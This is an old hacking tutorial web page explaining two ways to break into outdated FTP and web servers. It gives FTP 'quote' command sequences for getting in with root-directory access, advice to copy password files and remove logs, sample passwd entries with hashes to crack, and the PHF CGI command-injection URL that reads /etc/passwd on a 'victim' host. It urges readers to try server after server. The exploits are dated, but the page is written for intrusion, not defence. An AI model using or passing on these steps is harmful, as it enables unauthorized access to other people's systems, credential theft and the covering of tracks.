Two old ways to break past ftp server

FTP
Networking
List of Computers
Shell Accounts
UNIX
Windows
Command Prompt
Ports
Comp Secruity
Weboard
Links
Tutorials & Games
Visual Basic
My Programs
Sign Guestbook
View Guestbook

 You can do this from your shell account, command prompt in windows95/98/nt.  This properly won't work on newer servers, but will on the older ones that many universities have, and in countries other that US and Europe.  Those who like to flame, I know and you know these are old methods that will only work on the older servers, hence why I said OLD.

ftp server.com
server asks for username - press enter
server asks for password - press enter
At the prompt type
quote user ftp
then
quote cwd ~root
then
quote pass ftp

This should give you enough access yo go and take a gander round the system and pull any password files you may want and remove any logs (These files could be anywhere, but passwords usally in /usr/passwd - watch out for shadowed password files)

When you find where the password files are, you want to make sure you do not copy a shadowed file, if they have one on board it will look something like this, the x, means its shadowed.  This could also be a star(*) or something.

root:x:0:0:Never Use Root:/:/bin/sh
bin:x:1:1:bin:/bin:
ftp:x:5:1::/sdd/ftp:/bin/bash
mlist:x:54:54:Listserver:/usr/local/bin:/bin/ksh
usenet:x:9:13:USENET News Admin:/var/lib/news:/bin/ksh
uucp:x:10:14:UNIX-to-UNIX Copy:/var/spool/uucppublic:
Uadaptex:x:10:14::/var/spool/uucppublic:/usr/lib/uucp/uucico

If you hit something like this then you are in business.   You can see the password is encrypted, but not shadowed.  You would need to get a password cracker like crackerjack to get to work on this.

root:5yhdd933kd0:0:0:Never Use Root:/:/bin/sh
bin:28ytggfdnce34:1:1:bin:/bin:
ftp:3fdfnhloa54e4:5:1::/sdd/ftp:/bin/bash
mlist:4fcad57q5ghqe5:54:54:Listserver:/usr/local/bin:/bin/ksh
usenet:4fdry547:9:13:USENET News Admin:/var/lib/news:/bin/ksh
uucp:5fhfcffoey84edf:10:14:UNIX-to-UNIX Copy:/var/spool/uucppublic:
Uadaptex:44fxnmjk7:10:14::/var/spool/uucppublic:/usr/lib/uucp/uucico

If you crack the passwords you will have the system to your mercy.

Getting some password files without logging onto the system, again this will only proberly work with primative machines.

You could use your ftp client to try and get to the /etc directory.  This is not always blocked by ftp.  If it is, hard luck.  If it is not, then download the password file and run cracker jack on it.  OK, this next one was discovered around '96 and used to break into a FBI computer.  Most servers know about this flaw and is not really worth trying, but you always can if you are down on your luck.  But you never know, university machines and machines from people outside of US and Europe could be vulnerable.

Enter this url in your browser.  Of course exchange www.webpage.com will be www.victim.com.   You be unsuccessful, successful or receive a nice message saying your ip has been logged and appropriate action will be taken.

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd    www.spawn.com www.garply.com

If you have no luck, move on to the next server and then the next server, poking about see what you can find.